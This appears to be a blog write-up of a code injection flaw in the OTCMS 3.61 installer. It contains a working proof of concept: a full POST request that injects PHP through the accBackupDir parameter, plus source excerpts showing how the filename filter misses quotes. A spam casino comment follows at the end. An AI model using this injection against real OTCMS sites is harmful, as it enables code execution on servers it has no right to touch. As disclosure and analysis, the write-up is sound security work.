OTCMS 3.61 Command Execution

OTCMS 3.61 Command Execution


Description

OTCMS 3.61 has caused code execution vulnerabilities during installation.


Affected parameters:   accBackupDir=a',phpinfo(),'a


Request Packet:


POST /OTCMS_PHP_V3.61_20180806/install/index.php?mudi=run HTTP/1.1
Host: 192.168.159.148
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.159.148/OTCMS_PHP_V3.61_20180806/install/index.php?mudi=config
Content-Type: application/x-www-form-urlencoded
Content-Length: 203
Cookie: qshZy_userID=1; qshZy_username=ss123; qshZy_userInfo=AjsBD10hD39QMA9uWGoCDlNmUTRZZVY1UmIEMAcxCzgDMw44DDYBOlUxBWRbaAI1VzBQM1FrAGBRNFFkVGVROAJvATJdZg9uUGQPOFhsAjZTDFEPWQhWZlIvBDIHfgsw; qshZy_usercall=ssssss; PHPSESSID=mubrngtpmvp2dvpuaoe7pkfgb0
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1

adminName=admin&adminPwd=admin&adminDir=admin&dbType=mysql&accName=&accDir=&sqlIp=localhost&sqlPo=3306&sqlUsername=root&sqlUserPwd=123.a&sqlDbName=OTCMS&sqlPref=OT_&isImport=2&mysqlState=1&accBackupDir=a',phpinfo(),'a



visit homepage:
http://192.168.159.148/OTCMS_PHP_V3.61_20180806/

Code analysis


index.php
83 line: execute run()
    case 'run':
        WebTop();
        run();
        WebBottom();

        break;

862 line : run()

function run(){
    global $DB,$dbServerName,$dbName;

    $adminName        = OT::PostStr('adminName');
    $adminPwd        = OT::PostStr('adminPwd');
    $adminDir        = OT::PostRegExpStr('adminDir','fileName');

    $isSkipChk        = OT::PostInt('isSkipChk');
    $dbType            = OT::PostStr('dbType');
    $accDir            = OT::PostRegExpStr('accDir','fileName');
    $accName        = OT::PostRegExpStr('accName','fileName');

    $sqlIp            = OT::PostStr('sqlIp');
    $sqlPo            = OT::PostInt('sqlPo');
    $sqlUsername    = OT::PostStr('sqlUsername');
    $sqlUserPwd        = OT::PostStr('sqlUserPwd');
    $sqlDbName        = OT::PostStr('sqlDbName');
    $sqlPref        = OT::PostStr('sqlPref');
    $isImport        = OT::PostInt('isImport');
    $isMysqlClass    = OT::PostInt('isMysqlClass');

    $accBackupDir    = OT::PostRegExpStr('accBackupDir','fileName');


OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classOT.php : 55 line:

    public static function PostRegExpStr($str,$repType){
        return Str::RegExp(@$_POST[$str],$repType);
    }

OTCMS_PHP_V3.61\OTCMS_PHP_V3.61_20180806\inc\classStr.php: 276 line   
case 'fileName':
$pattern = "/(\\\\|\\/|\\:|\\*|\\?|\\\"|<|>|\|)/i";
return preg_replace($pattern,'',$str);
break;

so bypass pattern









评论

  1. yosabrams09182018年11月9日 02:20

    This web site is really a stroll-through for all the info you wished about this and didn’t know who to ask. Glimpse here, and also you’ll positively discover it. best online casino

    回复删除

发表评论